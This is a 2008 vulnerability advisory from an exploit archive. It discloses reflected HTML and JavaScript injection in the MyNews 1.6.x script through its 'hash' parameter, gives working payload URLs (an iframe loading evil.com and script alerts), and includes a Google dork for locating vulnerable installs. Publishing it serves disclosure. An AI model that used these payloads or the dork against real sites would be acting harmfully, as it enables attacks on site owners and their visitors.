planetluc-xss.txt

planetluc-xss.txt: Posted Feb 6, 2008; Authored by SkyOut | Site core-security.net; MyNews version 1.6.x suffers from HTML and Javascript injection vulnerabilities allowing for cross site scripting attacks.; tags | exploit, javascript, vulnerability, xss; SHA-256 | 7ea731e2ab60cc85afda394d2c913259d2b356b42ef368a1c66d4f0c9dddf581; Download | Favorite | View

planetluc-xss.txt

I know its basic, but I am a supporter of FD and therefore  
planetluc.com has to be
blamed now! I checked their script MyNews in version 1.6.4 today and  
then some
other versions, all are vulnerable to HTML and JS injection.

--- ADVISORY ---

----------------------------
|| WWW.SMASH-THE-STACK.NET ||
-----------------------------

|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: GOOGLE DORK
|| 0x05: RISK LEVEL
____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: February 2008
Contact: skyout[-at-]smash-the-stack[-dot-]net
Website: http://www.smash-the-stack.net/

_________________
|| 0x01: DATELINE

2008-02-06: Bug found
2008-02-06: Advisory released

____________________
|| 0x02: INFORMATION

The MyNews script by planetluc.com in all versions of the 1.6.X tree is
vulnerable to HTML and JS injection due to no sanitation of the "hash"
value in combination with the action "admin".

_____________________
|| 0x03: EXPLOITATION

No exploit is needed to test this vulnerability. You just need a working
web browser.

1: HTML Injection

To make a HTML injectioni, visit the websites main page. The name  
might differ
from the original name "mynews.inc.php", mostly its called  
"index.php". Now
construct a malformed URL as follows:

http://www.example.com/index.php?hash="><iframe src=http:// 
www.evil.com/ height=500px width=500px></iframe><!--&do=admin

Of course you can manipulate the values of "height" and "width" like you
want to. Do it the way it best fits to your needs!

2: JavaScript Injection

JS injection is similar to HTML injection, just that you put a JS code
in the "hash" parameter. Let me show you two examples:

http://www.example.com/index.php?hash="><script>alert(1337);</ 
script><!--&do=admin

or

http://www.example.com/index.php?hash="><script>alert("XSS");</ 
script><!--&do=admin

Sometimes using strings doesn't work, so test it first!

____________________
|| 0x04: GOOGLE DORK

intext:"powered by MyNews 1.6.*"

___________________
|| 0x05: RISK LEVEL

- LOW - (1/3) -

<!> Happy Hacking <!>

____________________________________________________________
____________________________________________________________

THE END

--- ADVISORY ---

Sincerely,
SkyOut

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

planetluc-xss.txt

planetluc-xss.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

planetluc-xss.txt

Share This

planetluc-xss.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems